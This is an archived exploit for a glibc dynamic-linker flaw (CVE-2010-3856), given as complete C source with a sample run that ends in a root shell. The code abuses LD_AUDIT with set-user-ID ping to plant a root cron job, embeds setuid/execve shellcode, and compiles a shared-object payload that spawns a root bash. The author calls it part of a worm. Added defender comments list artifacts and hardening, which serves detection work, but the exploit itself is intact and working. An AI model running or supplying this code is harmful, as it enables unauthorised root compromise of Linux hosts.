==============================================
GNU C Library local root (uid=0,gid=0) Exploit
==============================================
GNU C Library local root (uid=0,gid=0) exploit
bug found by tavis ormandy
exploit code by devilzc0de
software url: http://www.gnu.org/software/libc/
Category: local
tested on
sh-3.2# cat /etc/issue
Debian GNU/Linux 5.0 \n \l
[code]
/**
#Exploit Title: GNU C Library local root (uid=0,gid=0) exploit
#date: 04-12-10
#author: devilzc0de
#bugs found by: Tavis Ormandy (e-mail address obfuscated by the hosting site)
# Tested on: Debian GNU/Linux 5.0
#CVE: CVE-2010-3856
#vulnerable: GNU C Library (glibc) dynamic linker, ld.so: LD_AUDIT handling when running set-user-ID programs
a basic exploit made by: devilzc0de (www.devilzc0de.org)
special thanks to all devilzc0de crews and members, glodhaxors crews and members
this is part of my worm (currently making dual os worm for 7 months)
mywisdom@<hostname-not-preserved>:~/sploit$ id
uid=1002(mywisdom) gid=1001(mywisdom) groups=1001(mywisdom)
mywisdom@<hostname-not-preserved>:~/sploit$ ./glibc
GLIBC local privilege escalation exploit
Bugs found by Tavis Ormandy
made by: devilzc0de.org
ERROR: ld.so: object 'libpcprofile.so' cannot be loaded as audit interface: undefined symbol: la_version; ignored.
Usage: ping [-LRUbdfnqrvVaA] [-c count] [-i interval] [-w deadline]
[-p pattern] [-s packetsize] [-t ttl] [-I interface or address]
[-M mtu discovery hint] [-S sndbuf]
[ -T timestamp option ] [ -Q tos ] [hop1 ...] destination
[+]waiting for dropped suid shell from our cron daemon, please wait ...
sh-3.2# id
uid=0(root) gid=0(root) groups=1001(mywisdom)
sh-3.2#
**/
#include <string.h>
#include <sys/types.h>
#include <stdio.h>
#include <sys/stat.h>
#include <stdlib.h>
#include <unistd.h>
/*
 * salam: print the three-line banner to stdout.
 *
 * Output only; it touches no files and changes no process state. The banner
 * text is the same text shown in the sample run in the file header, which
 * makes it a usable string indicator when triaging an unknown binary.
 */
void salam()
{
    static const char banner[] =
        "\n\nGLIBC local privilege escalation exploit\n"
        "\nBugs found by Tavis Ormandy\n"
        "\nmade by: devilzc0de.org\n\n";

    fputs(banner, stdout);
}
/*
 * eksplo1: cron-based path, chosen by main() when /etc/cron.d exists.
 *
 * Sequence as written:
 *   1. umask(0), then bikin_payload1() builds /tmp/suidshell.
 *   2. If /lib/libpcprofile.so is present, ping is started with LD_AUDIT
 *      naming that library and PCPROFILE_OUTPUT naming /etc/cron.d/w00t.
 *   3. If /etc/cron.d/w00t exists afterwards, a root cron entry is written
 *      into it, the code sleeps 60 seconds, then runs /tmp/gotroot.
 *   4. eksplo2() is the fallback when the library or the cron file is
 *      missing; both checks can fail, so it can be called twice.
 *
 * Defender notes:
 *   - On-disk artifacts named in this function: /etc/cron.d/w00t,
 *     /tmp/gotroot (a set-user-ID copy of /bin/dash), /tmp/suidshell.
 *   - Useful signals: a set-user-ID program started with LD_AUDIT or
 *     PCPROFILE_OUTPUT in its environment; a file in /etc/cron.d that no
 *     package owns; any set-user-ID file under /tmp.
 *   - Remediation is the glibc update for the CVE named in the file header.
 *     Mounting /tmp with nosuid makes the set-user-ID bit on /tmp/gotroot
 *     ineffective, which limits this specific path.
 *
 * NOTE(review): every popen() result is discarded (never read, never
 * pclose()d) and bikin_payload1()/eksplo2() are called before any
 * declaration is visible, so nothing here confirms that a step succeeded.
 * A host may therefore show only some of the artifacts above.
 */
void eksplo1()
{
int i; /* unused */
struct stat bufer;
/* Clears the file-creation mask for this process and its children.
 * Presumably so that the file created via PCPROFILE_OUTPUT ends up writable
 * by the calling user; the later shell redirection into it relies on that. */
umask(0);
bikin_payload1();
/* Package-ownership query; its output is never read, so it does not
 * influence the branch below. */
popen("dpkg -S /lib/libpcprofile.so","r");
if(stat("/lib/libpcprofile.so",&bufer)!=0)
{
eksplo2();
}
else
{
/* The core of the issue: ping is set-user-ID root, and the output file
 * named in the environment is created under /etc/cron.d. The ld.so
 * "cannot be loaded as audit interface" error in the header's sample run
 * comes from this command. */
popen("LD_AUDIT='libpcprofile.so' PCPROFILE_OUTPUT='/etc/cron.d/w00t' ping","r");
}
if(stat("/etc/cron.d/w00t",&bufer)!=0)
{
eksplo2();
}
else
{
if(stat("/tmp/suidshell",&bufer)!=0)
{
/* Helper binary was not built; give up. */
exit(1);
}
else
{
/* Cron entry: every minute, as root, copy /bin/dash to /tmp/gotroot and
 * set its set-user-ID bit. The entry stays active until the file is
 * removed, so cleanup must delete /etc/cron.d/w00t as well as the copy. */
popen("echo '* * * * * root cp /bin/dash /tmp/gotroot; chmod u+s /tmp/gotroot\n' > /etc/cron.d/w00t", "r");
}
printf("[+]waiting for dropped suid shell from our cron daemon, please wait ...\n");
/* 60,000,000 microseconds = 60 s, i.e. one cron interval. */
usleep(60000000);
system("/tmp/./gotroot -c /tmp/./suidshell");
}
}
/*
 * bikin_payload1: write a small C program to ./suid.c and compile it to
 * /tmp/suidshell.
 *
 * The generated program holds a byte array and calls it as a function. The
 * bytes decode as 32-bit x86 Linux int 0x80 system calls: setuid(0),
 * setgid(0), then execve of "/bin//sh".
 *
 * Defender notes:
 *   - The \x escapes below are resolved when THIS file is compiled, so
 *     suid.c on disk contains the raw bytes, not the text "\x6a...".
 *     Content signatures for suid.c should match bytes, not escape text.
 *   - Artifacts: suid.c in the current working directory, /tmp/suidshell.
 *   - A gcc invocation by an unprivileged user writing into /tmp is part
 *     of the process trail.
 *
 * NOTE(review): declared int but returns nothing; the fopen() result is not
 * checked before fwrite(); the popen() stream is never read or closed.
 */
int bikin_payload1()
{
FILE *fp2;
const char *str2 ="char shellcode[] =\"\x6a\x17\x58\x31\xdb\xcd\x80\x6a\x2e\x58\x53\xcd\x80\x31\xd2\x6a\x0b\x58\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80\";int main(){int (*f)() = (int(*)())shellcode;f();}";
fp2 = fopen("suid.c", "w");
fwrite(str2, 1, strlen(str2), fp2);
fclose(fp2);
popen("gcc -o /tmp/suidshell suid.c","r");
}
/*
 * bikin_payload2: write a one-function C source to ./payload.c and compile
 * it as a position-independent shared object at /tmp/exploit.
 *
 * The generated source defines a constructor (it runs when the object is
 * loaded) that calls setuid(0) and then system("/bin/bash").
 *
 * Defender notes:
 *   - Artifacts: payload.c in the current working directory and a shared
 *     object at /tmp/exploit (the same path main() creates as a directory).
 *   - An ELF shared object in a world-writable directory is worth alerting
 *     on, as is gcc -shared run by an unprivileged account.
 *
 * NOTE(review): declared int but returns nothing; the fopen() result is not
 * checked before fwrite(); the popen() stream is never read or closed.
 */
int bikin_payload2()
{
FILE *fp;
const char *str ="void __attribute__((constructor)) init(){ setuid(0);system(\"/bin/bash\");}";
fp = fopen("payload.c", "w");
fwrite(str, 1, strlen(str), fp);
fclose(fp);
/* -w suppresses compiler warnings (the generated source has no includes). */
popen("gcc -w -fPIC -shared -o /tmp/exploit payload.c","r");
}
/*
 * il_fil_de: delete leftovers from an earlier run.
 *
 * Removes payload.c and suid.c from the current working directory and
 * /tmp/exploit, each only if stat() says it exists. It does not touch
 * /etc/cron.d/w00t, /tmp/gotroot or /tmp/suidshell, so those must still be
 * checked for during incident cleanup.
 */
void il_fil_de()
{
    static const char *const leftovers[] = {
        "payload.c",
        "suid.c",
        "/tmp/exploit",
    };
    struct stat st;
    size_t idx;

    for (idx = 0; idx < sizeof leftovers / sizeof leftovers[0]; idx++) {
        if (stat(leftovers[idx], &st) != 0) {
            continue; /* nothing at this path */
        }
        remove(leftovers[idx]);
    }
}
/*
 * eksplo2: fallback path that does not use cron.
 *
 * Sequence as written:
 *   1. remove /tmp/exploit, recreate it as a directory from a shell, and
 *      hard-link /bin/ping to /tmp/exploit/target;
 *   2. open that link on file descriptor 3 in a shell;
 *   3. remove /tmp/exploit again and have bikin_payload2() build a shared
 *      object at that same path;
 *   4. run /proc/self/fd/3 with LD_AUDIT set to the literal string $ORIGIN.
 *
 * NOTE(review): this relies on the dynamic linker expanding $ORIGIN for a
 * set-user-ID program, which looks like a separate glibc issue from the
 * LD_AUDIT/libpcprofile.so one used in eksplo1 -- confirm against the
 * vendor advisories before scoping remediation to a single CVE.
 *
 * Defender notes:
 *   - Signals: a hard link to a set-user-ID binary inside a world-writable
 *     directory; a set-user-ID program started with LD_AUDIT in its
 *     environment; execution via a /proc/self/fd/N path.
 *   - Hardening that removes the precondition: the fs.protected_hardlinks
 *     sysctl on kernels that have it, or keeping /tmp on its own
 *     filesystem (hard links cannot cross filesystems) mounted nosuid.
 *
 * NOTE(review): declared int but returns nothing, and every popen() and
 * remove() result is discarded, so no step is confirmed to have succeeded.
 */
int eksplo2()
{
remove("/tmp/exploit");
popen("mkdir /tmp/exploit;ln /bin/ping /tmp/exploit/target","r");
popen("exec 3< /tmp/exploit/target","r");
remove("/tmp/exploit");
bikin_payload2();
/* After C unescaping the shell sees LD_AUDIT="\$ORIGIN": the backslash
 * keeps the shell from expanding it, so the variable's value is the
 * literal text $ORIGIN. */
popen("LD_AUDIT=\"\\$ORIGIN\" exec /proc/self/fd/3","r");
}
/*
 * main: print the banner, clear leftovers, create /tmp/exploit, then pick a
 * path: eksplo1() when /etc/cron.d exists, eksplo2() otherwise.
 *
 * argc and argv are not used. Control falls off the end of main without an
 * explicit return, as in the original.
 *
 * Defender note: a world-accessible (mode 0777) directory /tmp/exploit is
 * created on every run, before either path is attempted, so its presence
 * alone shows the program was started, not that anything succeeded.
 */
int main(int argc,char **argv[])
{
    struct stat st;
    int have_cron_d;

    salam();
    il_fil_de();
    mkdir("/tmp/exploit",0777);

    have_cron_d = (stat("/etc/cron.d",&st)==0);
    if (have_cron_d) {
        eksplo1();
    } else {
        eksplo2();
    }
}
[/code]
# 0day.today [2018-02-19] #